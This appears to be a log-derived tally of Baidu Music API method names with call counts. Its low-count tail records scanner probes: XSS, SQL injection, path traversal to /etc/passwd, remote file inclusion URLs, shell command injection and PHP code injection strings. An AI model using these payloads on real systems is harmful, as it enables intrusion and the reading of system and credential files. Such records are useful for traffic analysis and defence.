baidu.ting.song.getInfos	66803232
baidu.ting.song.baseInfo	35674744
baidu.ting.search.lrcpic	29786932
baidu.ting.outerPassport.profile	24253315
baidu.ting.user.listenAge	21397201
baidu.ting.search.common	19268808
baidu.ting.search.catalogSug	18890197
baidu.ting.song.play	16601308
baidu.ting.song.down	8535918
baidu.ting.user.getUserBaseInfo	7642917
baidu.ting.song.lry	7426042
baidu.ting.artist.getSongList	5573289
baidu.ting.artist.getList	5573251
baidu.ting.billboard.billList	4724362
ting.baidu.diy.getPlaylists	4638098
baidu.ting.song.getInfo	4531810
baidu.ting.favorite.isCollect	4529337
baidu.ting.search.lrcys	4458460
baidu.ting.user.config	4360681
baidu.ting.search.getPhotoInfos	3954310
baidu.ting.game.gamedetail	3669521
baidu.ting.plaza.getRecommendAlbum	3450640
baidu.ting.active.start	3026699
baidu.ting.user.checkComVersion	2961603
baidu.ting.plaza.active	2956866
baidu.ting.artist.getInfo	2537257
baidu.ting.radio.playAction	2517329
baidu.ting.user.checkSuggestVersion	2448648
baidu.ting.diy.gedanInfo	2320603
	2274715
baidu.ting.plaza.getFocusPic	2210340
baidu.ting.user.getMessage	1987037
baidu.ting.diy.gedanHot	1847682
baidu.ting.search.suggestion	1494230
ting.baidu.plaza.recdaily	1473884
baidu.ting.diy.category	1440740
baidu.ting.vip.checkVIPPromotion	1392081
baidu.ting.artist.getinfo	1328344
baidu.ting.radio.getChannelSong	1268830
baidu.ting.plaza.recdaily	1191761
baidu.ting.user.registToUC	1191153
baidu.ting.album.getAlbumInfo	1130510
baidu.ting.diy.getSongFromOfficalList	1102303
baidu.ting.favorite.getCollectSong	1073382
baidu.ting.plaza.getPartDesc	1021242
baidu.ting.feedback.song	972453
baidu.ting.diy.addListenCount	906841
baidu.ting.artist.getAlbumList	774167
baidu.ting.diy.gedan	767053
baidu.ting.user.RegistToImsg	744619
baidu.ting.user.down	677035
baidu.ting.song.buffer	668260
baidu.ting.song.audio	602081
baidu.ting.diy.getNowOfficalList	575646
baidu.ting.tag.getHotTag	564792
baidu.ting.tag.songlist	523697
baidu.ting.radio.getCategoryList	519117
baidu.ting.billboard.billCategory	475449
baidu.ting.diy.getPlaylists	355109
baidu.ting.search.lrcyss	346748
baidu.ting.game.gamelist	278102
baidu.ting.search.getPhotoInfo	229059
baidu.ting.artist.get72HotArtist	218140
baidu.ting.plaza.recommend	211214
baidu.ting.song.getMulInfos	177606
baidu.ting.favorite.getFavoriteSong	170607
baidu.ting.favorite.addSongFavorites	134977
baidu.ting.mv.getIndexMV	123327
baidu.ting.diy.search	112217
baidu.ting.tag.getAllTag	104309
baidu.ting.favorite.addSongFavorite	103730
baidu.ting.video.getList	92884
baidu.ting.video.play	88762
baidu.ting.diy.getSimilarGedan	85322
baidu.ting.diy.getOfficialDiyList	81248
baidu.ting.artist.getSpecialSongList	52360
baidu.ting.plaza.getNewSongs	49855
baidu.ting.user.checkVersion	49508
baidu.ting.favorite.delCollectSong	48055
ting.baidu.diy.getPlaylist	41220
baidu.ting.mv.playMV	37002
baidu.ting.radio.getArtistChannelSong	30700
baidu.ting.feedback.crash	29356
baidu.ting.radio.getFavoriteSong	25124
baidu.ting.plaza.getArtistPlaza	18060
baidu.ting.radio.serv	17617
baidu.ting.diy.getPlaylist	16942
baidu.ting.user.nplogin	13658
baidu.ting.artist.getHighSongTitle	12984
baidu.ting.album.getList	12356
baidu.ting.song.cloud	9482
baidu.ting.mv.searchMV	9297
baidu.ting.diy.saveList	9058
ting.baidu.film.getFilmInfo	8386
baidu.ting.favorite.delSongFavorite	8286
baidu.ting.video.category	8037
baidu.ting.diy.addListSong	7993
baidu.ting.artist.getQianQianArtist	7843
baidu.ting.song.getMulInfo	7170
ting.baidu.song.lry	6778
baidu.ting.weixin.response	6671
baidu.ting.user.logout	5877
baidu.ting.billboard.catalog	5270
baidu.ting.cloud.checkFile	5211
baidu.ting.diy.delList	4979
baidu.ting.cloud.record	4927
baidu.ting.diy.delListSong	4084
baidu.ting.artist.getHighSongList	3930
baidu.ting.user.regPassport	3842
baidu.ting.colorRing.listen	3365
ting.baidu.search.lrcpic	3183
baidu.ting.user.getMobileVcode	2875
ting.baidu.artistapp.renum	2571
ting.baidu.search.common	2490
baidu.ting.colorRing.authset	2324
baidu.ting.colorRing.getCode	2248
baidu.ting.favorite.delSongFavorites	2171
baidu.ting.diy.getRecommendSpeical	1741
baidu.ting.mv.getMultiSongMVInfo	1588
baidu.ting.song.getPic	1583
baidu.ting.artist.getInfoList	1571
baidu.ting.favorite.getFavoriteAlbum	1350
baidu.ting.vip.checkUserExchange	1253
baidu.ting.artist.getSongRank	1246
baidu.ting.cloud.expand	1225
ting.baidu.billboard.billlist	1223
baidu.ting.artist.getSong	1209
baidu.ting.diy.addList	1006
baidu.ting.feedback.info	947
ting.baidu.artistapp.brief	913
baidu.ting.favorite.getListenHistory	852
baidu.ting.mv.getMVCategory	704
ting.baidu.plaza.getRecommendAlbum	701
baidu.ting.user.activate	696
ting.baidu.song.cloud	686
ting.baidu.song.baseInfo	681
ting.baidu.song.getinfos	656
ting.baidu.song.play	652
ting.baidu.diy.gedan	635
ting.baidu.diy.gedaninfo	632
ting.baidu.song.down	630
ting.baidu.diy.gedanhot	623
baidu.ting.video.recMv	597
ting.baidu.billboard.billCategory	592
baidu.ting.favorite.getOffenListenList	531
baidu.ting.diy.upList	392
ting.baidu.plaza.getFocusPic	353
baidu.ting.cloud.signature	338
baidu.ting.colorRing.toneset	305
baidu.ting.song.getSuoSongInfo	279
baidu.ting.artist.getInfoByName	271
baidu.ting.colorRing.subscribe	227
baidu.ting.user.login	199
ting.baidu.artistapp.newList	186
baidu.ting.artistapp.photo	182
baidu.ting.song.getHash	181
ting.baidu.artistapp.news	168
baidu.ting.favorite.getInfoFromView	137
baidu.ting.favorite.addAlbumFavorite	112
baidu.ting.vip.exchangeVIP	97
baidu.ting.favorite.delAlbumFavorite	74
baidu.ting.user.addPassportInfo	59
ting.baidu.artistapp.briefs	43
baidu.ting.plaza.getMisNewSong	40
baidu.ting.album.getAlbumstyle	32
ting.baidu.user.checkComVersion	23
baidu.ting.game.catalog	17
ting.baidu.artistapp.send	17
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	16
baidu.ting.song.playAAC	10
ting.baidu.favorite.getCollectSong	9
skin.getList	9
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	6
\' (	6
(	6
ting.baidu.mv.playmv	6
baidu.ting.song.play\';alert(1);\'	4
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	2
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	2
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	2
baidu.ting.song.play--></script><script>alert(1)</script>	2
baidu.ting.song.play</textarea></title><script>alert(1)</script>	2
http://cirt.lnet/rfiinc.txt	2
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	2
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	2
baidu.ting.song.play</script><script>alert(1);//	2
../../../../../../../../../../etc/rc.d/rc.local_	2
baidu.ting.song.play<script>confirm(1)</script>	2
../../../../../../../../../../etc/rc.d/rc.local	2
baidu.ting.song.play\') and 8288=8288 and (\'	2
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	2
baidu.ting.song.play\' and \'8281\'=\'8281	2
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	2
c:/windows/win.ini	2
set	2
../../../../../../../../../../etc/passwd	2
	2
baidu.ting.song.playjavascript:alert(1)	2
file:///etc/rc.d/rc.local_	2
baidu.ting.song.play\'\";alert(1);//	2
baidu.ting.song.play>\'>\"><script>alert(1)</script>	2
data://text/plain;base64,dGVzdA==_	2
baidu.ting.song.play\";alert(1);\"	2
file:///etc/rc.d/rc.local	2
http://10.42.7.217/?1388422748.26	2
http://10.42.7.217/?1388312951.23	2
data://text/plain;base64,dGVzdA==	2
1\\\";cat /etc/rc.d/rc.local;\\\"	2
file:///etc/passwd_	2
baidu.ting.song.play;alert(1);//	2
string:{var_dump(md5(812812))}	2
c:/windows/win.ini_	2
%{	2
${	2
/usr/bin/id;	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	2
\'];${@print(md5(812812))};//	2
1\';cat /etc/rc.d/rc.local;\'	2
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	2
http://cirt.lnet/rfiinc.txt_	2
../../../../../../../../../../etc/passwd_	2
${@print(md5(812812))}	2
file:///etc/passwd	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.htm	1
../../../../../../../../../../etc/rc.d/rc.local_.html	1
file:///etc/passwd_.php	1
file:///etc/passwd_.jpg	1
../../../../../../../../../../etc/passwd_.html	1
../../../../../../../../../../etc/passwd_.php	1
c:/windows/win.ini_.php	1
c:/windows/win.ini_.htm	1
baidu.ting.favorit0000 `T`0`<`@`D`__h__P_	1
data://text/plain;base64,dGVzdA==_.jpeg	1
data://text/plain;base64,dGVzdA==_.jpg	1
baidu.t068816	1
../../../../../../../../../../etc/rc.d/rc.local_.jpeg	1
http://cirt.lnet/rfiinc.txt_.jpeg	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.song.getInfDVlL3yapos	1
file:///etc/rc.d/rc.local_.php	1
1;cat /etc/rc.d/rc.local;	1
file:///etc/rc.d/rc.local_.htm	1
baidu.ting.artist.getSongVote	1
baidu.ting.sgid=20417095	1
baidu.ting.search.lvcpic	1
baidu.ting.game.gameplay	1
baidu.ting.rom=android	1
baidu.ting.push.send	1
baidu.ting	1
